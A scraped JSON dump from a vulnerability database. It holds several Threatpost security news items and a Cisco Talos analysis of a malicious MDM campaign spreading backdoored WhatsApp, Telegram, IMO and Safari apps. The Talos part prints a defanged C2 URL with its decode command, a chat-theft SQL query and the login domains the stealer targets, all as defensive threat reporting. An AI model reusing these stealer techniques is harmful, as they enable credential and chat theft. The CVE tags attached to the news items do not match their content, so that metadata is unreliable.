environment.\n\n\u201cTo tell people that they can\u2019t use their computers for what they want it a battler we\u2019re going to lose over and over again,\u201d he said. \u201cPeople don\u2019t buy their computers to be secure. They buy them to watch dancing babies.\u201d\n", "modified": "2014-03-03T22:04:34", "published": "2014-02-26T14:14:34", "id": "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "href": "https://threatpost.com/threat-modeling-legos-and-dancing-babies/104517/", "type": "threatpost", "title": "Threat Modeling, Legos and Dancing Babies", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:01", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[](<https://threatpost.com/microsoft-fixes-beast-ssl-bug-january-patch-tuesday-011012/>)Microsoft on Tuesday patched the vulnerability in Windows that was exploited by the [BEAST SSL attack](<https://threatpost.com/new-attack-breaks-confidentiality-model-ssl-allows-theft-encrypted-cookies-091911/>) tool developed by Juliano Rizzo and Thai Duong last year. The patch is one of several rated important that was issued by Microsoft in [January\u2019s Patch Tuesday](<https://technet.microsoft.com/en-us/security/bulletin/ms12-jan>) release, and there also was a critical bulletin released, fixing two separate vulnerabilities in Windows Media Player.\n\nThe vulnerability that is fixed by the patch in [MS12-](<https://technet.microsoft.com/en-us/security/bulletin/ms12-006>)006 actually lies in the SSL 3.0/TLS 1.0 protocol. The attack that Rizzo and Duong developed and released in September enables them to decrypt users\u2019 SSL sessions on the fly and hijack them, including sessions with online banking sites and other sensitive sites. The bug has been known for a long time, but it wasn\u2019t until last year that a practical exploitation of it surfaced.\n\n\u201cThis vulnerability affects the protocol itself and is not specific to the Windows operating system. The vulnerability could allow information disclosure if an attacker intercepts encrypted web traffic served from an affected system. TLS 1.1, TLS 1.2, and all cipher suites that do not use CBC mode are not affected,\u201d Microsoft said in its bulletin. \u201cThe security update addresses the vulnerability by modifying the way that the Windows Secure Channel (SChannel) component sends and receives encrypted network packets.\u201d\n\nThe highest priority bulletin for the January release is [MS12-004](<https://blogs.technet.com/b/srd/archive/2012/01/10/more-information-on-ms12-004.aspx?Redirected=true>), which includes fixes for two vulnerabilities in Windows Media Player. One of the bugs in that bulletin is the only critical one fixed in January, and it\u2019s a remote code execution flaw. It affects Windows XP, Vista, Server 2003 and Server 2008.\n\nThere\u2019s also a vulnerability in the Windows kernel that has the effect of allowing attackers to bypass one of the exploit-mitigation technologies in Windows, SafeSEH. After bypassing that, an attacker could then use other bugs to compromise an affected machine.\n\n\u201cThis issue can result in SafeSEH not being enforced for a binary that has been built with support for SafeSEH. This occurs when a binary that was built with Microsoft Visual C++ .NET 2003 RTM is loaded by an application running on a version of Windows that is affected by MS12-001,\u201d Microsoft said in the bulletin.\n\n\u201cThe reason that SafeSEH is not enforced in this scenario is because Microsoft Visual C++ .NET 2003 RTM produces binaries with metadata that is a different size than what the Windows loader expects. As a result, the loader conservatively falls back to assuming that the binary does not support SafeSEH. MS12-001 addresses this issue by allowing binaries to have metadata of the size that is produced by Microsoft Visual C++ .NET 2003 RTM.\u201d\n", "modified": "2013-04-17T16:33:01", "published": "2012-01-10T19:31:32", "id": "THREATPOST:20A9D9F111F89A61A6242B788FCF6209", "href": "https://threatpost.com/microsoft-fixes-beast-ssl-bug-january-patch-tuesday-011012/76083/", "type": "threatpost", "title": "Microsoft Fixes BEAST SSL Bug in January Patch Tuesday", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:29", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft\u2019s lawsuit against the U.S. government for the right to tell its customers when a federal agency is looking at their emails is getting widespread support by privacy advocates. For many, Microsoft\u2019s stance lends an important and powerful voice to ongoing efforts to reform the Electronic Communications Privacy Act that is at the heart of Microsoft\u2019s beef with the government. \n\n\u201cWe applaud Microsoft for challenging government gag orders that prevent companies from being more transparent with their customers about government searches of their data,\u201d said Andrew Crocker, staff attorney with the Electronic Frontier Foundation. \n\nFor Crocker and Microsoft, the stance is tied to bigger issues such as free speech and First Amendment rights. \u201cIn nearly all cases, indefinite gag orders and gag orders issued routinely rather than in exceptional cases are unconstitutional prior restraints on free speech and infringe on First Amendment rights,\u201d he said. \n\nThe software giant\u2019s chief legal officer Brad Smith said Microsoft said it has been required to maintain secrecy about more than 2,500 legal demands over the past 18 months. More than 1,752 (68 percent) of those secrecy orders had no end date. Smith noted that, \u201cThis means we effectively are prohibited forever from telling our customers that the government has obtained their data.\u201d \n\nMicrosoft\u2019s lawsuit challenges gag order provision in the Electronic Communications Privacy Act (ECPA) that allows courts to force companies that offer cloud storage to say nothing when asked to turn over customer data. Reforms of ECPA have been long fought by privacy advocates such as the Electronic Privacy Information Center. \n\nAlan Butler, senior counsel at Electronic Privacy Information Center said that such secret orders by the government should be the exception, but increasingly the requests have become the rule. \u201cNotice is one of the key protections provided under the Fourth Amendment, and law enforcement efforts to delay or otherwise restrict notice should be viewed skeptically by the courts,\u201d he said. \n\nFor the ACLU, it used Microsoft\u2019s lawsuit as an opportunity for Congress to implement reforms on the Electronic Communications Privacy Act. \u201cIf Congress fails to include those changes as it considers ECPA reform, then the courts should step in, including in Microsoft\u2019s case, to end the government\u2019s constitutional failure to provide notice,\u201d said Alex Abdo, staff attorney with the ACLU in a statement.\n\nMicrosoft\u2019s lawsuit is the latest in a string of high-profile battles with the government over privacy issues. Last week, tech firms and privacy advocates banded together to [voice opposition to a draft bill](<https://threatpost.com/burr-feinstein-anti-crypto-bill-slammed-by-critics/117314/>), Compliance with Court Orders Act of 2016. Then, of course, there is Apple and its battle with the government\u2019s demands to help it crack its own encryption in order to break into an iPhone.\n\nControversial aspects of ECPA have been debated for years. In fact, earlier this week the House Judiciary Committee amended a current ECPA reform bill \u2014 the Email Privacy Act \u2014 by removing a provision that also attempts to fix notice requirement. The timing of Microsoft\u2019s suit is fortuitous, Butler said. \n\n\u201cI think this lawsuit will provide a much needed venue to address the lack of notice for email warrants,\u201d Butler said. \u201cCongress has had the opportunity in the past to address this problem, but has not yet taken the steps necessary to do so. The court should reaffirm that notice is a critical component of government searches under the Fourth Amendment,\u201d he said. \n\nAs for Microsoft\u2019s hope of victory? EFF\u2019s Crocker said Microsoft has a strong case. \u201cGiven the numbers Microsoft lists in the complaint and the statute\u2019s failure to comport with the First Amendment, I think there\u2019s a pretty good likelihood the suit will at the minimum force some changes to the government\u2019s practices or ECPA,\u201d Crocker said. \n\nBecause of the secret nature of such requests, it\u2019s impossible to tell how many secret government information requests businesses receive. One estimate from a 2012 report authored by Texas Southern University\u2019s Thurgood Marshall School of Law called \u201c[Gagged, Sealed & Delivered](<https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2071399>)\u201d (PDF), estimates 30,000 electronic surveillance orders approved by magistrate judges each year. \n\u201cIndividuals have a constitutional right to receive notice when their persons, papers, and effects have been subject to search. The denial of this right is a harm, and prevents realistic engagement by the public on an issue of national importance (privacy),\u201d EPIC\u2019s Butler said. \n", "modified": "2016-04-15T19:22:02", "published": "2016-04-15T15:22:02", "id": "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "href": "https://threatpost.com/microsoft-wins-widespread-support-in-privacy-clash-with-government/117458/", "type": "threatpost", "title": "Microsoft Wins Widespread Support in Privacy Clash With Govt.", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft will use its monthly patch to fix a critical security hole in versions of its Microsoft Office suit that could allow attackers to run malicious code on vulnerable systems. \n\nThe company [announced details of its upcoming monthly patch for November on Thursday](<http://www.microsoft.com/technet/security/bulletin/ms10-nov.mspx>). This months patch also included bulletins regarding upcoming fixes for two other security vulnerabilities: another in the Microsoft Office suite that was rated \u201cimportant,\u201d and a third in the Forefront Unified Access Gateway that was also rated \u201cimportant.\u201d \n\nThe relatively meager group of three bulletins is a welcome change for IT administrators still trying to dig out from[ October\u2019s monthly patch](<https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/>), which comprised 16 bulletins and fixes for 49 separate vulnerabilities. \n\nThe most serious vulnerability is rated \u201ccritical\u201d for Microsoft Office 2007, Service Pack 2 and for 32 and 64 bit editions of Office 2010. It is rated \u201cimportant\u201d for Office 2003, Service Pack 3, Office XP, Service Pack 3 and Office for Mac 2011. \n\nAccording to Microsoft\u2019s Bulletin [Severity Rating System](<http://www.microsoft.com/technet/security/bulletin/rating.mspx>), \u201ccritical\u201d vulnerabilities are described as those whose exploitation could allow the propagation of an Internet worm without user interaction, while \u201cimportant\u201d holes are those in which exploitation could result in the compromise of the confidentiality, integrity or availability of users\u2019 data or processing resources. \n\nA second Office vulnerability is rated \u201cimportant\u201d and effects PowerPoint 2002 Service Pack 3 and PowerPoint 2003 Service Pack 3. \n\nThe third bulletin affects Microsoft\u2019s Forefront Unified Access Gateway 2010 Updates 1 and 2 and is rated important. \n\nMicrosoft will release its monthly patch update on Tuesday November 9, 2010. \n", "modified": "2013-04-17T16:35:44", "published": "2010-11-04T21:58:02", "id": "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "href": "https://threatpost.com/microsoft-patch-critical-office-flaw-110410/74642/", "type": "threatpost", "title": "Microsoft To Patch Critical Office Flaw", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:25", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft says a recent patch for Outlook 2007 after it caused slow performance and problems with third party e-mail services. Microsoft withdrew a software update [released last week](<https://threatpost.com/microsoft-closes-door-stuxnet-december-patch-121410/>) after reports that the update, to its Outlook 2007 e-mail product, was causing problems for customers connecting to third party e-mail products. \n\nThe company has withdrawn the update [KB2412171](<http://support.microsoft.com/kb/2412171>) from its Microsoft Update service, [according to a blog post](<http://blogs.msdn.com/b/outlook/archive/2010/12/17/issues-with-the-recent-update-for-outlook-2007.aspx>). Microsoft recommends that customers who have installed it and encountered problems uninstall the patch.\n\nUsers began reporting problems with the Outlook 2007 update soon after it was released on December 14. Among other things, customers reported severe slowdowns in the Outlook 2007 application when moving between mail folders or clicking on Calendar or Task links. \n\nCustomers who used Outlook to send and receive messages from e-mail servers that were not running Microsoft\u2019s Exchange e-mail server software, including Gmail and Windows Live Hotmail. In addition, the update prevented Gmail users from connecting to Gmail\u2019s mail servers if the Outlook Secure Password Authentication (SPA) option was enabled, and broke Auto Archiving for IMAP, POP3 and Oulook Live Connector Accounts that were managed using Outlook, if no Exchange Server account was configured in the same Outlook profile, Microsoft said. \n\nMicrosoft apologized for the disruption and has provided instructions for removing the update while the company investigates the performance issues. \n", "modified": "2013-04-17T16:35:28", "published": "2010-12-21T17:21:16", "id": "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "href": "https://threatpost.com/microsoft-withdraws-outlook-update-after-gmail-conflicts-122110/74796/", "type": "threatpost", "title": "Microsoft Withdraws Outlook Update After Gmail Conflicts", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:30", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>)Microsoft has released a workaround for the [Windows kernel zero-day vulnerability exploited by the Duqu](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) malware, and said that it is working on a permanent patch, but didn\u2019t specify a timeline for its release. The vulnerability is a serious one that can lead to remote code execution on vulnerable machines.\n\nIn an advisory issued Thursday night, Microsoft security officials said that the flaw is in the TrueType font parsing engine in Windows. This is the first time that the exact location and nature of the flaw has been made public. Microsoft said that the permanent fix for the new vulnerability will not be ready in time for next week\u2019s November patch Tuesday release. The [FixIt tool](<http://support.microsoft.com/kb/2639658>) that Microsoft released Thursday automatically applies the workaround that the company suggests in its security [advisory on the Windows kernel flaw](<https://technet.microsoft.com/en-us/security/advisory/2639658>).\n\nTo apply the workaround manually, users of 32-bit systems can enter the following at the command prompt:\n\n`Echo y| cacls \"%windir%system32t2embed.dll\" /E /P everyone:N`\n\nFor 64-bit systems, users should enter this at the command prompt:\n\n`Echo y| cacls \"%windir%system32t2embed.dll\" /E /P everyone:N`\n\n`Echo y| cacls \"%windir%syswow64t2embed.dll\" /E /P everyone:N`\n\nMicrosoft said in its advisory that although the overall effect of the vulnerability is low thus far, it has been used in some targeted attacks by the [Duqu malware](<https://threatpost.com/using-stuxnet-and-duqu-words-mass-disruption-102011/>).\n\n\u201cMicrosoft is investigating a vulnerability in a Microsoft Windows component, the Win32k TrueType font parsing engine. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. We are aware of targeted attacks that try to use the reported vulnerability; overall, we see low customer impact at this time.,\u201d the advisory says.\n\nThe company said it is monitoring the ongoing attacks and is aware that the kind and prevalence of the attacks could change quickly, so it is recommending that users install the workaround now and then the patch when it is available.\n\n\u201cFinally, given our ability to detect exploit attempts for this issue, we are able to closely monitor the threat landscape and will notify customers if we see any indication of increased risk. As previously stated, the risk for customers remains low. However, that is subject to change so we encourage customers to either apply the workaround or ensure their anti-malware vendor has added new signatures based on the information we\u2019ve provided them to ensure protections are in place for this issue,\u201d [Microsoft\u2019s Jerry Bryant](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) said in a blog post.\n", "modified": "2013-04-17T16:33:25", "published": "2011-11-04T11:47:32", "id": "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "href": "https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/75850/", "type": "threatpost", "title": "Microsoft Releases Workaround For Kernel Flaw Used By Duqu", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. Microsoft also said that running IE7 in Protected Mode, which limits some of its functionality, on Windows Vista, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting; and enabling DEP (Data Execution Protection) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will autoatically enable DEP.\n\n\n\nMicrosoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. Microsoft also said that running IE7 in Protected Mode, which limits some of its functionality, on Windows Vista, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting; and enabling DEP (Data Execution Protection) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will automatically enable DEP.\n", "modified": "2018-08-15T14:04:18", "published": "2009-11-24T14:39:50", "id": "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "href": "https://threatpost.com/microsoft-reconoce-falla-en-ie-7-112409/73159/", "type": "threatpost", "title": "Microsoft Acknowledges IE7 Flaw", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:58", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[From ZDNet (Ryan Naraine)](<http://blogs.zdnet.com/security/?p=3553>)\n\nMicrosoft\u2019s batch of patches this month is a big one: 10 bulletins covering a total of 31 documented vulnerabilities affecting the Windows OS, the Internet Explorer browser and the Microsoft Office productivity suite (Word, Works and Excel).\n\nFive of the 10 bulletins are rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. Among the patches this month are fixes for [a pair of IIS WebDav flaws that were publicly disclosed](<http://blogs.zdnet.com/security/?p=3424>) last month and cover for the [CanSecWest Pwn2Own vulnerability](<http://blogs.zdnet.com/security/?p=2951>) that was used to exploit Internet Explorer on Windows 7. Read the full story [here](<http://blogs.zdnet.com/security/?p=3553>).\n", "modified": "2013-04-17T16:39:09", "published": "2009-06-09T20:26:38", "id": "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "href": "https://threatpost.com/microsoft-unleashes-31-fixes-patch-tuesday-060909/72724/", "type": "threatpost", "title": "Microsoft unleashes 31 fixes on Patch Tuesday", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "talosblog": [{"lastseen": "2018-07-25T12:50:08", "bulletinFamily": "blog", "cvelist": ["CVE-2018-0802"], "description": "_This blog post is authored by[ ](<https://twitter.com/securitybeard?lang%3Den>)[Warren Mercer](<https://twitter.com/securitybeard?lang%3Den>) and[ ](<https://twitter.com/r00tbsd>)[Paul Rascagneres](<https://twitter.com/r00tbsd>) and[ ](<https://twitter.com/SmugYeti>)[Andrew Williams](<https://twitter.com/SmugYeti>)._ \n \n\n\n## Summary\n\n \nSince our [initial post](<https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html>) on malicious mobile device management (MDM) platforms, we have gathered more information about this actor that we believe shows it is part of a broader campaign targeting multiple platforms. These new targets include Windows devices and additional backdoored iOS applications. We also believe we have associated this actor with a very similar campaign affecting Android devices. \n \nWith this additional information, we have been able to build a profile of how the MDM was working, as explained in the previous post, while also allowing us to identify new infrastructure. We feel that it is critical that users are aware of this attack method, as well-funded actors will continue to utilize MDMs to carry out their campaigns. To be infected by this kind of malware, a user needs to enroll their device, which means they should be on the lookout at all times to avoid accidental enrollment. \n \nIn the new MDM we discovered, the actor changed some of their infrastructure in an attempt to improve the MDM's security posture. We also found additional compromised devices, which were again located in India, with one even using the same phone number linking the MDM platforms, and one located in Qatar. We believe this newer version was used from January to March 2018. Similar to the previous MDM, we were able to identify the IPA files the attacker was using to compromise iOS devices. Additionally, we discovered that malicious apps such as WhatsApp had new malicious methods tacked onto them. \n \nDuring this ongoing analysis, we also looked into other potential indicators that would point us toward the actor. We discovered this [Bellingcat article](<https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/>) that potentially links this actor to one they dubbed \"Bahamut,\" an advanced actor who was previously targeting Android devices. Bahamut shared a domain name with one of the malicious iOS applications mentioned in our previous post. There was also a separate post from [Amnesty International](<https://medium.com/amnesty-insights/operation-kingphish-uncovering-a-campaign-of-cyber-attacks-against-civil-society-in-qatar-and-aa40c9e08852>) discussing a similar actor that used similar spear-phishing techniques to Bahamut. However, Cisco Talos did not find any spear phishing associated with this campaign. We will discuss some links and potential overlapping with these campaigns below. \n \n \n \n\n\n## New MDM\n\n \n\n\n### Technical information about the MDM\n\n \nTalos identified a third MDM server that we believe was used by this actor: ios-update-whatsapp[.]com. \n \nThe first relevant difference between this MDM and the MDM we discussed in the previous article is the fact that the attackers patched the open-source project[ ](<https://github.com/project-imas/mdm-server>)[mdm-server](<https://github.com/project-imas/mdm-server>) \u2014 a small iOS MDM server. The attackers added an authentication process. In the last version, no authentication was available. Here is the auth page: \n\n\n[](<https://4.bp.blogspot.com/-uT9H_HJ3wXk/W1bKIgF7dnI/AAAAAAAAAfY/ymIstJCMcXEVxhV4kFW3P0kabJDMMDYDQCLcBGAs/s1600/image1.png>)\n\n \nAdditionally, we identified different technical information based on the certificate used. Here is the certificate used by this MDM: \n \nCA.crt \n\n \n \n Serial Number: 17948952500637370160 (0xf9177d33a2d98730) \n Signature Algorithm: sha256WithRSAEncryption \n Issuer: C=HK, ST=Kwun Tong, L=6/F 105 Wai Yip St 000000, O=TECHBIG, OU=IT, CN=TECHBIG.COM/emailAddress=info@techbig.com \n Validity \n Not Before: Jan 15 09:47:15 2018 GMT \n Not After : Jan 15 09:47:15 2019 GMT \n Subject: C=HK, ST=Kwun Tong, L=6/F 105 Wai Yip St 000000, O=TECHBIG, OU=IT, CN=TECHBIG.COM/emailAddress=info@techbig.com \n \n\nA fake company, Tech Big, which was allegedly located in Hong Kong, had this certificate issued to it in January 2018. \n\n\n### Log analysis\n\n \nThree devices were enrolled on this server: \n \n\n\n * Two devices with an Indian phone number that were also located in India (one of the devices has the same phone number as the believed attacker's device used in the previous post)\n * One device with a British phone number located in Qatar\n \nThe logs showed us that the MDM was created in January 2018, and was used from January to March of this year. \n \n\n\n## New malicious iOS apps\n\n \n\n\n### Fake Telegram & WhatsApp\n\n \nTalos identified two other malicious Telegram and WhatsApp apps. The attacker built these apps by adding malicious capabilities to existing Telegram and WhatsApp applications. The malicious aspect of the apps is the same as what we described in the previous post. The only difference is the command and control (C2) obfuscation. The URLs are not stored in plaintext, but are encrypted with data encryption standard (DES) and encoded in base64. \n \nHere is an example of the encoded URL: \n\n\n[](<https://3.bp.blogspot.com/-U-SgHhHsSg0/W1bKOlAYAJI/AAAAAAAAAfc/T6E32Sxt8soJebKun7fg17bKFcBQN0v8gCLcBGAs/s1600/image3.png>)\n\n \nAnd the DES key: \n\n\n[](<https://3.bp.blogspot.com/-LNu9YvVUt-k/W1bKUUFpw9I/AAAAAAAAAfg/hS5O3ODLvc4680_Ot9OpCQIOwwxDEwSlwCLcBGAs/s1600/image4.png>)\n\n \nOnce decoded and decrypted, we can easily read the URL of the C2: \n\n \n \n ./decode.py vZVI2iNWGCxO+FV6g46LZ8Sdg7YOLirR/BmfykogvcLhVPjqlJ4jsQ== '&%^*#@!$' \n hxxp://hytechmart[.]com/UcSmCMbYECELdbe/ \n \n\n### Fake IMO\n\n \nIMO is a chat and video app available on mobile devices. We identified a fake application that pretended to be IMO. The attackers used the same technique to add malicious code to the legitimate application: BOptions sideloading technique. For more information about this technique, we recommend reading the previous blog post. \n \nThe C2 server has the same obfuscation technique as the fake, malicious Telegram and WhatsApp apps described above. The attacker simply changed the encryption key used. The purpose of the malicious code is similar to the previous malicious apps in that it steals contact information and chat history. This application uses SQLite to store the data. Here is an example of request performed to get the data: \n \n\n\n * DBManager accesses 'IMODb2.sqlite'\n * Select ZIMOCHATMSG.Z_PK,ZIMOCHATMSG.ZTEXT,ZIMOCHATMSG.ZISSENT,ZIMOCONTACT.ZPHONE,ZIMOCONTACT.ZBUID AS Contact_ID from ZIMOCONTACT join ZIMOCHATMSG ON (ZIMOCONTACT.ZBUID = ZIMOCHATMSG.ZBUID) where ZIMOCHATMSG.Z_PK >'%d'\n\n### Malicious Safari browser\n\n \nTalos has also discovered a malicious Safari application available on the third malicious MDM. For this application, the attackers did not use the BOptions sideloading technique. It's a malicious browser developed from scratch and based on three open-source projects: [SCSafariPageController](<https://github.com/stefanceriu/SCSafariPageController>), [SCPageViewController ](<https://github.com/stefanceriu/SCPageViewController>)and [SCScrollView](<https://github.com/stefanceriu/SCScrollView>). \n \nThe purpose of this browser is to steal sensitive information from the infected device. First, the app sends the universally unique identifier (UUID) of the device to the C2 server. Based on the server response, the malicious browser will send additional information, such as the user's contact information (picture, name, email, postal address, etc.), the user's pictures, the browser's cookies and the clipboard. \n \nThe malware checks for a file named \"hib.txt,\" and if the file doesn't exist on the device, it displays an iTunes login page in an attempt to harvest the user's login credentials. Upon entering the credentials, the email address and password are sent to the C2 server. Additionally, these credentials get written into the file and the user is considered \"signed in.\" \n \nThe most intriguing part is the credential stealer. If the browsed domain name contains one of the following strings, the malware will automatically exfiltrate the username and the password of the user to the C2 server. Most notably, there is the presence of secure email providers, among a variety of other web services. \n \n\n\n * Login.yahoo (email platform)\n * Mail.com (email platform)\n * Rediff (Indian news portal and email platform with around 95 million registered users)\n * Amazon (e-commerce platform)\n * Pinterest (image-sharing and discovery platform)\n * Reddit (news aggregation web portal with forums)\n * Accounts.google (Google sign-in platform)\n * Ask.fm (anonymous decentralised Q&A platform)\n * Mail.qq (Chinese email platform)\n * Baidu.com (Chinese search engine and email provider)\n * Mail.protonmail (secure email provider located in Switzerland)\n * Gmx (email platform)\n * AonLine.aon (British assurance)\n * ZoHo (Indian email service)\n * Tutanota (secure email provider located in Germany)\n * Lycos.com (search engine and web portal with email platform)\n \nThe malware continuously monitors a web page, seeking out the HTML form fields that hold the username and password as the user types them in to steal credentials. The names of the inspected HTML fields are embedded into the app alongside the domain names. Here is a list of the \"username\" fields that are referenced by the app code: \n\n\n[](<https://1.bp.blogspot.com/-6oBe3W50V6E/W1bKau_WeNI/AAAAAAAAAfo/PVNYBh_5yJ4ffuBjt25FhAxfV22DaTXiACLcBGAs/s1600/image5.png>)\n\nFor example, we see m_U, which is the username field in the Lycos mail authentication page: \n\n\n[](<https://3.bp.blogspot.com/-fkLqX32pCdU/W1bKf9CzIDI/AAAAAAAAAfw/T07PIxfpDU4rdQXSf1BZ3TJsiUIztbS8QCLcBGAs/s1600/image7.png>)\n\n \nThe malware contains a similar list concerning the password field. \n \nFinally, the malicious browser contains three malicious plugins: \n\n\n * \"Add Bookmark\"\n * \"Add To Favourites\"\n * \"Add to Reading List\"\nThe purpose of the malicious extensions are very similar to the previous ones \u2014 it sends off stored data to the same C2 server as the other apps. \n \nIn the core and the plugins, the C2 server is encoded in base64 and encrypted in AES instead of DES. \n \n\n\n## Links with previous campaign\n\n \nThe Bahamut group was discovered and detailed by Bellingcat, an open-source news website. In this post, the author was discussing Android-based malware with some similarities to the iOS malware we identified. That post kickstarted our investigation into any potential overlap between these campaigns and how they are potentially linked. \n \nThe new MDM platform we identified has similar victimology with Middle Eastern targets, namely Qatar, using a U.K. mobile number issued from LycaMobile. Bahamut targeted similar Qatar-based individuals during their campaign. \n \nWe identified an overlap in the domain voguextra[.]com, which was used by Bahamut within their \"Devoted To Humanity\" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post. Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal [here](<https://www.virustotal.com/%23/url/a65bcd077ea0c098ae0bc88414a38f2cf4333cae40d704eb88dfa043819f70d7/details>) using hxxp://voguextra[.]com/decoy.doc. \n \nThe domains used during this campaign shared similarities with the domains used throughout the Bahamut campaign reported by Bellingcat. Most of the email addresses used within the domains were [*@mail.ru](<mailto:*@mail.ru>) email accounts, the C2s identified both used AES encrypted strings represented as base64 values, and the URI patterns used in both campaigns shared an almost identical syntax: \n\n \n \n repository + random.php + GET value \n /hdhfdhffjvfjd/gfdhghfdjhvbdfhj.php?p=1&g=[string]&v=N/A&s=[string]&t=[string] \n \n\nThe domains also had similar structures for the domain name (they are formatted [word]-[word]-[word]) across both campaigns. Actors tend to stick with similar structures, especially if they have had success in the past. \n \nOnce we started profiling the domains, we quickly noticed a strong link to India. With access to historical whois and hosting information, we were able to determine that the three MDM domains pointed to an Indian nexus. All three domains used a privacy proxy to register their domains. However, what the actor did not do was create nameservers upon registering the domains. This allowed us to discover that two of the three domains were registered with Indian registrars and hosting providers. \n \nThe three domains identified for MDM use were ios-update-whatsapp[.]com, ios-certificate-update[.]com and www[.]wpitcher[.]com. \n \n**ios-update-whatsapp[.]com** \n \nThe nameserver used initially was obox.dns[.]com, which is owned by the India-based Directi platform, is an Indian registrar and was the original nameservers used by this domain. This later changed to being [ns1-2].ios-update-whatsapp[.]com, which suggests this domain was potentially registered and purchased in India. \n 